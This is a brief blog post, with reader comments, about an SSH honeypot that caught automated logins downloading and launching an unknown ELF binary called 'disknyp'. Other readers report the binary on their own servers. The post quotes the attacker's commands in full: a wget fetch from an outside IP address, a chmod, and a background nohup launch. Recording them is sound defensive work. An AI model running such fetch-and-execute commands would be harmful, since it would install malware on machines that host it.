Yesterday my ssh-honeypot captured 54 samples of “disknyp”.
All logins (probably automated) did the following:
**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03– http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>
The file is a 1491887 Bytes ELF 32-bit LSB executable. I don’t know yet what it is doing..
Tags: Honeypots
I got this on my Debian box sometime in the past couple weeks but I don’t know where it came from. Started noticing lots of CPU and network activity and saw “disknyp” in the process list. I even got email from my ISP about unusually high traffic.
The disknyp binary was in the /root directory along with a directory named .o
I deleted both and things seem to be ok.
Interesting, I’ve recently seen the same lines in a friend’s web server on AWS. Any updates on what does the binary do? Also I was brought here by google with exact the same lines, so the server with this file has been up for a while now. Let me know if you’re interested in joining me for reverse engineering that.